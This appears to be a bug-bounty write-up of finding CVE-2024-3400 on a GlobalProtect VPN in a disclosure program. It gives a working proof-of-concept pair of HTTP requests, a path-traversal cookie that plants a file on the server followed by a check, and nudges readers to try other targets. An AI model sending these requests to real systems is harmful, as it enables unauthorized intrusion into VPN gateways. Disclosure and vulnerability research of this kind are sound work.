.png)
4 months ago
31 BOOK THIS SPACE FOR AD
ARTICLE AD
Hey Hunters, I am Back with one another find so let's start
I am searching VDP for the hunt (VDP is easy) so I opened the H1 and started looking for Program and I found it
I am looking at scope and then I see URL vpn. redacted.com, I opened the URL and it was VPN by GlobalProtect Protocol I saw recently a CVE against that software CVE-2024–3400
I started Exploit for CVE and Target is vulnerable to that CVE.
Step to Reproduce
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: redacted.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
This Above request will create a file on the server named poc.txt
GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: redacted.com
Connection: close
Now send this request if you get 403 Forbidden so congratulations it’s working and if you get 404, Go back and find another target
After getting 403 Forbidden I immediately Reported to the program, Within 1 hour they responded
Bengali (Bangladesh) · 
English (United States) ·